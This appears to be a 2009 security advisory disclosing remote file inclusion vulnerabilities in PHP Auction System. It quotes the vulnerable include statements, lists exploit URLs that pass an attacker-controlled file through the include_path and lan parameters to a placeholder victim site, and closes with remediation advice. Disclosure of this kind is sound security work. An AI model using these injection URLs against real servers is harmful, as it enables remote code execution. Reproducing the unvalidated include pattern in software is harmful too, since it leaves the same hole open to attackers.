
# Title : PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-01-06
# Author : darkmasking


[??]=======================================================================================================[_][-][X]
[??]                                                                             				[??]
[??]      		   PHPAuctionSystem Multiple Remote File Inclusion Vulnerability    			[??]
[??]              				         							[??]
[??]            		 	=======    ------d-------m------     ====    ====   				[??]
[??]             	 	||     =        | |(o o)| |          ||   ||   ||   				[??]
[??]             		||     =          ||(~)||            ||        ||   				[??]
[??]             	 	=======             /|              ||        ||  				[??]
[??]=============================================================================================================[??]
[??] 				Author         	: ~darkmasking~		 					[??]
[??] 				Date           	: January, 6th 2009           					[??]
[??] 				Web           	: https://www.idsafeshield.com					[??]
[??]           		 	Contact        	: support[at]idsafeshield[dot]com  				[??]
[??]					Critical Level 	: Dangerous			  			[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]              		       Affected software description :        					[??]
[??]   				Software 	: PHP Auction System						[??]
[??]          			Vendor		: http://www.phpauctions.info/					[??]
[??]            			Price 	      	: $59.99							[??]
[??]=============================================================================================================[??]
[??]														[??]
[??]	[~] Vulnerable file											[??]
[??]														[??]
[??]		[+] All files below are affected by the "include_path" parameter				[??]
[??]														[??]
[??]		./includes/settings.inc.php									[??]
[??]		$password_file = $include_path."passwd.inc.php";						[??]
[??]		include($password_file);									[??]
[??]		include $include_path."fonts.inc.php";								[??]
[??]		include $include_path."fontsize.inc.php";							[??]
[??]		include($include_path."currency.inc.php");							[??]
[??]		include($include_path."errors.inc.php");							[??]
[??]		include($include_path."https.inc.php");								[??]
[??]														[??]
[??]		./includes/auction_confirmation.inc.php								[??]
[??]		require("./includes/messages.inc.php");								[??]
[??]														[??]
[??]		./includes/converter.inc.php									[??]
[??]		include($include_path."nusoap.php");								[??]
[??]														[??]
[??]		./includes/messages.inc.php									[??]
[??]		require($include_path.'messages.'.$language.'.inc.php');					[??]
[??]														[??]
[??]		./includes/stats.inc.php									[??]
[??]		include $prefix."includes/useragent.inc.php";							[??]
[??]		include $prefix."includes/domains.inc.php";							[??]
[??]														[??]
[??]		./includes/useragent.inc.php									[??]
[??]		include $prefix."includes/browsers.inc.php";							[??]
[??]		include $prefix."includes/platforms.inc.php";							[??]
[??]														[??]
[??]		./includes/user_confirmation.inc.php								[??]
[??]		require("./includes/messages.inc.php");								[??]
[??]														[??]
[??]														[??]
[??]		[+] All files below are affected by the "lan" parameter						[??]
[??]														[??]
[??]		./browse.php											[??]
[??]		./search.php											[??]
[??]		if(!empty($_GET['lan'])) {									[??]
[??]			$language = $lan;									[??]
[??]			$_SESSION['language'] = $language;							[??]
[??]														[??]
[??]		#// Set language cookie										[??]
[??]			setcookie("USERLANGUAGE",$lan,time()+31536000,"/");					[??]
[??]		} elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {			[??]
[??]			$language = $SETTINGS['defaultlanguage'];						[??]
[??]			$_SESSION['language'] = $language;							[??]
[??]														[??]
[??]		#// Set language cookie										[??]
[??]			setcookie("USERLANGUAGE",$language,time()+31536000);					[??]
[??]		} elseif(isset($_COOKIE['USERLANGUAGE'])) {							[??]
[??]			$language = $_COOKIE['USERLANGUAGE'];							[??]
[??]		}												[??]
[??]														[??]
[??]		require($include_path.'messages.'.$language.'.inc.php');					[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??]	[~] Exploit												[??]
[??]														[??]
[??]	[+] "include_path" parameter										[??]
[??]														[??]
[??]	http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]		[??]
[??]	http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode]			[??]
[??]	http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]		[??]
[??]														[??]
[??]														[??]
[??]	[+] "lan" parameter											[??]
[??]														[??]
[??]	http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]						[??]
[??]	http://www.darkvictims.com/[path]/search.php?lan=[darkcode]						[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??] 	[~] How to fix this vulnerability									[??]
[??]														[??]
[??]    	Edit the source code to ensure that input is properly validated. Where possible,			[??]
[??]    	it is recommended to make a list of accepted filenames and restrict the input to that list.		[??]
[??]    	Note that in browse.php/search.php the USERLANGUAGE cookie is copied into $language		[??]
[??]    	without any check before the require, so the validation must cover that path as well,		[??]
[??]    	not only the "lan" parameter. The included files also read $include_path, $prefix and		[??]
[??]    	$lan as plain variables, so the listed request parameters only reach them when			[??]
[??]    	register_globals is enabled; disabling it (or initialising those variables before use)		[??]
[??]    	closes that path too.										[??]
[??]														[??]
[??]    	For PHP, the option allow_url_fopen would normally allow a programmer to open,				[??]
[??]    	include or otherwise use a remote file using a URL rather than a local file path.			[??]
[??]    	It is recommended to disable this option in php.ini. Since PHP 5.2, include/require of a		[??]
[??]    	URL is additionally governed by the separate allow_url_include directive, which should		[??]
[??]    	also be kept disabled.										[??]
[??]														[??]
[??]-------------------------------------------------------------------------------------------------------------[??]
[??]														[??]
[??]	[~] Greetz												[??]
[??]														[??]
[??]	BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ]						[??]
[??]														[??]
[??]														[??]
[??]=============================================================================================================[??]
